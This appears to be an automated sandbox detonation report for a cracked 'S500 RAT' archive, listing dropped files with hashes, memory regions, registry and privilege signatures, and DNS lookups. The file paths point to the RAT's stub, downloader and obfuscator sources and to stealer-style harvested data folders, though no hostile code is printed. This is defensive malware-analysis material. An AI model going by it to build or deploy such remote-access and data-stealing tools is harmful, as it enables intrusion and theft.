C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe

MD5 604f8eb4afe0d9a9e3fb5f7981c09145
SHA1 92d44f43b4c9fc84b99ba34c5abb3672725ecc69
SHA256 682e2204557a05cddbaddef019cbc2eda6eaa50007f20851eadb9a33c35c458d
SHA512 cf35e1559004f48ed1ffbf5b78ae19861afb8e19a9979a49294da60f0f83ef7428bd3b5d09b869c6ce556141938d0d387deb350b10c0c9ca58087d384e4d3598

memory/4148-466-0x0000000000890000-0x00000000008C2000-memory.dmp

memory/4148-467-0x0000000073270000-0x000000007395E000-memory.dmp

memory/4148-468-0x0000000005200000-0x0000000005210000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe

MD5 5b52658c4517684971de10a6b7a67c30
SHA1 f0820c52617ebacaf53d8b8d97f1a42c712888bd
SHA256 3ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31
SHA512 ce96d25cfbb0d2c4addf242aa05c05909d7a883a70881df8336498b16913ec21bd64c07519eba89b2da90a05902fd7618e172a7602b985153eac09d9f226c8d6

memory/4604-471-0x0000000000400000-0x0000000000439000-memory.dmp

memory/3608-474-0x00007FF9B1090000-0x00007FF9B1A7C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B6D8.tmp\B6D9.tmp\B6E9.bat

MD5 fc4af7384f0b6f274dd3e745f0aceeaa
SHA1 31b310f869b15b84e52ef282cabaee974e5043cf
SHA256 f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34
SHA512 dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f

C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

MD5 aa2fc72b58059e5e7e9e7003ab466322
SHA1 e171576589134431baccb40d308e7dcbc776e087
SHA256 f107c0f275bd1c773e1ff2d78b60a4060b8353b02f45d3892968206fedffdf88
SHA512 26d69ad0d3f41bf08585307595e1d670c7d7905e1f86a566a36d9b0c836d3b349a6349e1f2885d433d35bd111f95ce004ae34e81443f96b73e784db3594e3eef

memory/3768-478-0x00007FF9B1090000-0x00007FF9B1A7C000-memory.dmp

memory/3768-479-0x0000026137C60000-0x0000026138D24000-memory.dmp

memory/3768-480-0x000002613AB40000-0x000002613AB50000-memory.dmp

memory/3768-482-0x00000261535E0000-0x00000261537D2000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\Guna.UI2.dll

MD5 0f07705bd42d86d77dab085c42775244
SHA1 7e4b5c367183f4753a8d610e353c458c3def3888
SHA256 cf9b66e11506fa431849350c0cb58430a71e5ec943d2db9ef1b2e2302f299443
SHA512 851b1a4c470ee7fe07ce5619c16fd391428585926c5b559694a9e445633ea51ec86c74a3bbf3bce39d943c4bf714dad2fd3c4a4d0703be2333541c79a2ee97f0

C:\Users\Admin\AppData\Local\Temp\c6ef4c2b-9a55-40b4-957b-c3cb74191397\GunaDotNetRT64.dll

MD5 9c43f77cb7cff27cb47ed67babe3eda5
SHA1 b0400cf68249369d21de86bd26bb84ccffd47c43
SHA256 f25b9288fe370dcfcb4823fb4e44ab88c7f5fce6e137d0dba389a3dba07d621e
SHA512 cde6fb6cf8db6f9746e69e6c10214e60b3646700d70b49668a2a792e309714dd2d4c5a5241977a833a95fcde8318abcc89eb9968a5039a0b75726bbfa27125a7

memory/3768-490-0x00007FF9B6F10000-0x00007FF9B703C000-memory.dmp

memory/3768-491-0x00007FF9B6EB0000-0x00007FF9B6ED7000-memory.dmp

memory/3768-493-0x0000026153C20000-0x0000026153E60000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.dll

MD5 af527b22b92a23c38a492c5961cf2643
SHA1 15106adfa13415287b3e9d8deba21df53cb92eda
SHA256 4208c9293c5684d2fc3c8f5a269a1120adee32fbd2766bbb73410aab2d491b7a
SHA512 543cce9b5e4c9558bf0bd0da9d6af8c1ad2f7d62e2d65a9aa4e3af9e4840ce6fb6bbe8952bd20f6f1e3a6d3b5e5e5b3417a60b6d955bfa4e23a653262677b49c

memory/4148-494-0x0000000005380000-0x00000000053E6000-memory.dmp

memory/3768-495-0x000002613AB40000-0x000002613AB50000-memory.dmp

memory/4604-496-0x0000000000400000-0x0000000000439000-memory.dmp

memory/3768-497-0x000002613AB40000-0x000002613AB50000-memory.dmp

memory/3768-498-0x000002613AB40000-0x000002613AB50000-memory.dmp

memory/3768-499-0x0000026153BE0000-0x0000026153C12000-memory.dmp

memory/3768-500-0x000002613AB40000-0x000002613AB50000-memory.dmp

memory/4148-501-0x0000000073270000-0x000000007395E000-memory.dmp

memory/3768-502-0x000002613AB40000-0x000002613AB50000-memory.dmp

memory/4148-503-0x0000000005200000-0x0000000005210000-memory.dmp

memory/3768-504-0x00007FF9B1090000-0x00007FF9B1A7C000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Stage2.asm

MD5 e03eaf459f028cc6fa8669e277c1a17a
SHA1 ea0a775e49e279208962a9179c974969a2cf7e5e
SHA256 a32a88946334b5f32fe890fcb104b090dd38cb32ef7948f5b8382bcc2d8da61f
SHA512 17efa3673568cc44f9ef8b925bd133e1bf69851cfcbac2888db5a3a7b522c15be0d6155b4311c704355be086cfd809547628d3cb963449e4bd277fc2682d895d

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\PebApi.asm

MD5 be38b0526e6d40f44c7b62d8db2c9553
SHA1 5c4c70ae1381b5e51a685f96700340832229c06d
SHA256 f1eaa5bd68ac32d37066ba1cb83d1349526df1558d7cf0767950760f442f788f
SHA512 77ba15f77a94afe24ef725a54dbefbc83894981b34fac4002e2b50bc22336d40fb371ded8db2bab3b68e76e182f552121fd443ff34211b3f96fce393e7c113ac

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Melt.asm

MD5 78f905ea7378410c450c79ceb3b9012b
SHA1 495f677fd305c78a77e8164f7de7d732e1aca35c
SHA256 50156675295081d268576f77201b4f78bb466446e18ca4af410833f16de7646a
SHA512 ae549f79413222a81e9b2082f3ea287ee8a34626a43bfb43c29bfb2504324620740dae465263fa280ada6450895fe856512b38b94455b058022a143e2a6583f5

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Emulator.asm

MD5 1efa2056cd994a29fd0d2e983ef7b26e
SHA1 76967624574c43b1e22e9b3ec4ba17139b547633
SHA256 1e832c97029620e75e6f8a053d3ec90750e7f5857803ebce82526bfa9ec39e9d
SHA512 edccae7798df98b6ed9ed3ec7fbc09acd7aeafd700704383b7e065ae2c155afc50854b21b0fd2fa20de2c0efbc674079fe9463744789b109e23ae840fa7c4ac2

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\register.txt

MD5 e9f329a48dcb70c6ad95c8ab8fe82eb0
SHA1 45e25355e67fd2d528467b4117884ffb601552a3
SHA256 5dd46720271713bdef9edafe9058dbee1a10003dea7cac4cb5cdb53d68a3a637
SHA512 62648e1f40ff46f54921adfd928b7cae29a9bd9778e0334b80ca593e9afbcdc287c1e7df5afa08cb44fa97cfcdd164216c4adb9566af146ac00da6fbb3e8cad4

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\nop_minimal.txt

MD5 963be96779d4ef26360c2a3af3a53816
SHA1 6991959998c9939e5ededa0d6759a715559c2140
SHA256 f639582a95112fc90e21e63757e8814f957cb597fbc18d15603e433bf551aaf4
SHA512 4525ce17036d54504143b39eb5a1a7ee1b6abe4f42ebca82c78d66d387f68f427595e73705f19ed0b61cc12c4cd473b84b3e7d87290deb8bf8a86eb904b520b0

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\nop.txt

MD5 f7bbcdd86cbc1d6d0b81720ac1477fde
SHA1 4799c37f86be4dda105ed3468934f70c36339474
SHA256 50f8cecbfc4491bb320692efbc0003b045760683bb63913fd42152dafc0c922f
SHA512 2a49ee7b7fe7b6e319455f9f9dde0906187dac60076ad83e161ef68a91319827183af0f1ae48b6e6e656419a9cb5029a29591e15083da8f113660724863445c2

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Stub.asm

MD5 a54153cd522d951f6b360c3bd3de84d0
SHA1 639dbc414f495044c2d705f39ac965212f1c8c30
SHA256 195e94c80f787fa5e24168c46fe392d2710e9c6e4b25b31ed73201c3d2bc93fa
SHA512 95e49e83a69e5480cc2eda09e9124236a5a10af2c99795825b001005d0dd0806cf203e93cdf7459101c082b198d9c1c6078d6bbf8075d33818b87f7e7e1ae5e3

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Download.asm

MD5 e6fad395145548f21929c4050a70d710
SHA1 97a8780b8a3d25185f83f88c5f320384b4069601
SHA256 c0a37c88fd96703c0e1f8779143bb22471d7eaea8ec05d2892feed5cd15dcf92
SHA512 857035df11651a57af93af57fc2e4728afe99016479a508fdbb7bc1f6ea1c9305e32939533aed86bdabd2a1b190b9e8b0c1d1c62b0194902e068e35d40167799

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Compression.asm

MD5 feb8d2de1663adc1e141b8f7bb95d6ac
SHA1 a9b1c4d0f522515c940a80876876d782510cb421
SHA256 ac2add960f9b626020137271676a37d6185b05c55000d2f0858f7e788e0ab37b
SHA512 af139097158c44b5feb297655dcc925fffe95acf9f2cf2248e46e3538b94a2e5f84caa01f4c1a6d0166d9fa258a2052c49e673b6ee9566ba7625f4733c6487a3

C:\Users\Admin\Desktop\S500 RAT Cracked\Readme.txt

MD5 531208ea558a68c95339bea9517845c3
SHA1 95865bbeb196cf007626c92cdef1524c9b16dc5a
SHA256 dbceb36fa695bfe2bd706b22cb690976a3df77a46ec97d9188a3875308044b3a
SHA512 46f04b05cd14d80bef69325802464d190856af9f2844312f84263baf00eb14d3ca58d647fed8fcc5de0106883ec3f2546fed8b58ca09464fd6a336e7dece66f3

C:\Users\Admin\Desktop\S500 RAT Cracked\Login.txt

MD5 d5b77dfb5f248f3aabc560d8300088c5
SHA1 bbf7bb5f78051a59e725920cea3d54d1e7473cea
SHA256 113a6f39d02edb55049baa38c50d26579247acb7427e7494805a91e415e21a55
SHA512 180e45da4adc3643d40ded2ff526af67361f77b6c61f05d3739e10e41327614a5f57485148f32d047f6d9169230053a77c9cc6fe5e7ced2d2dc285a7b8269552

C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Browsers\Firefox\Bookmarks.txt

MD5 2e9d094dda5cdc3ce6519f75943a4ff4
SHA1 5d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256 c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512 d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

C:\Users\Admin\Desktop\S500 RAT Cracked\initialization.dll

MD5 3aaae3cec15b86693ae9fb8e1507c872
SHA1 ed8d0a139c609eb886482718ec2ecf96cbbe8c84
SHA256 a027b6b344e5a637bc8377fe58166273d2b76e92ff8c66bd505d46c21fe3b21b
SHA512 407558e01ade1832bb021b5af0209e7a6bef98ab35b9f4723a1add48362bd13f566697a8fb41af48c0bb15ca13585f9c09ac8d5da0feb322798c778b09cf4463

memory/3768-577-0x000002615A2B0000-0x000002615A2BC000-memory.dmp

memory/3768-579-0x000002615A2E0000-0x000002615A2F2000-memory.dmp

memory/3768-581-0x000002615A2C0000-0x000002615A2CA000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\Certificate\ServerCertificate.p12

MD5 c60e527a85f285ddc66c2fcf160b1be7
SHA1 abcf2b6bffea9f0f30190783f6eae2434ef7a9a8
SHA256 35c46a9e9dc60a74a25572e743794a31fecd08672813d349a39f2d13b01e789f
SHA512 77a661544c2d7f2d8b870cdd503b806aea6de3a2b5aee19327c05aeef137a1df3661d249219fe73e7a300189c732efeb5d2004226c6e429fa024f1d3b1dec84e

memory/3768-592-0x000002616C8E0000-0x000002616C91C000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.Common.dll

MD5 17cbdd9e4cb0ede2fad8c08c05fdaa84
SHA1 74bc0ea3e8bd64c6752b6c0adac1bfe2b313416c
SHA256 d975bc4711655e6fd2361ae9b056c617051f616ced5b46ce7772255a85712441
SHA512 1948c20585ecb9984cd9452a74bcb75e81c35ca37f0cf0e1d3f211ad71b9e40c215f4784af7803cec9baef9984f682a32817a85806aefad21830b13b6a0a6a4a

memory/3768-643-0x000002613AB40000-0x000002613AB50000-memory.dmp

C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\System\Process.txt

MD5 0cfc72d4b2ba7e01d8fd978431f377a7
SHA1 595abcdfdc505f461a2092c17b5dc4b6b78253b9
SHA256 4b6f8aba628f8446e11d058f196723227c01a0d278996dc50cd580be9f3567f3
SHA512 72d1b0265fdd09c1a008eb6350222af53a166fd7c0ee7795d0d0a6fc6bd84d32bc185873951fd885e2588c6af9c6e6b4897364119002ef1e1b8fa6ce42ea9858

memory/3768-666-0x00007FF9B6EB0000-0x00007FF9B6ED7000-memory.dmp

memory/4148-667-0x0000000005200000-0x0000000005210000-memory.dmp

memory/4148-669-0x0000000006140000-0x00000000061D2000-memory.dmp

memory/4148-670-0x00000000066E0000-0x0000000006BDE000-memory.dmp

memory/3768-673-0x000002613AB40000-0x000002613AB50000-memory.dmp

memory/3768-676-0x000002613AB40000-0x000002613AB50000-memory.dmp

memory/3768-677-0x000002613AB40000-0x000002613AB50000-memory.dmp

memory/4148-678-0x0000000006230000-0x000000000623A000-memory.dmp

memory/3768-679-0x000002613AB40000-0x000002613AB50000-memory.dmp

memory/3768-680-0x000002613AB40000-0x000002613AB50000-memory.dmp

memory/4148-681-0x0000000005200000-0x0000000005210000-memory.dmp

C:\Users\Admin\AppData\Local\1ca9a780f62d391eab5af10e0d5b79d1\msgid.dat

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

memory/4148-688-0x00000000063A0000-0x00000000063B2000-memory.dmp

memory/3768-728-0x0000026164E80000-0x0000026164F80000-memory.dmp

memory/3768-732-0x0000026164E80000-0x0000026164F80000-memory.dmp

memory/3768-736-0x00007FF9B1090000-0x00007FF9B1A7C000-memory.dmp

memory/364-740-0x00007FF9B1090000-0x00007FF9B1A7C000-memory.dmp

memory/364-741-0x000001F139C50000-0x000001F139C60000-memory.dmp

memory/364-743-0x000001F139C50000-0x000001F139C60000-memory.dmp

memory/364-744-0x000001F139C90000-0x000001F139CB2000-memory.dmp

memory/364-747-0x000001F139E40000-0x000001F139EB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g1xbvrcg.pvm.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/364-762-0x000001F139C50000-0x000001F139C60000-memory.dmp

memory/364-787-0x000001F139C50000-0x000001F139C60000-memory.dmp

memory/364-791-0x00007FF9B1090000-0x00007FF9B1A7C000-memory.dmp

memory/4604-792-0x0000000000400000-0x0000000000439000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-03-30 13:53

Reported

2024-03-30 14:46

Platform

win10v2004-20240226-en

Max time kernel

425s

Max time network

1153s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4652 wrote to memory of 896 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 4652 wrote to memory of 896 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Network

Country Destination Domain Proto
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 41.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 130.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 218.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 178.223.142.52.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 213.143.182.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-03-30 13:53

Reported

2024-03-30 14:46

Platform

win11-20240221-en

Max time kernel

452s

Max time network

1174s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2332 wrote to memory of 3712 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 2332 wrote to memory of 3712 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Network

Country Destination Domain Proto
US 8.8.8.8:53 107.211.222.173.in-addr.arpa udp

Files

N/A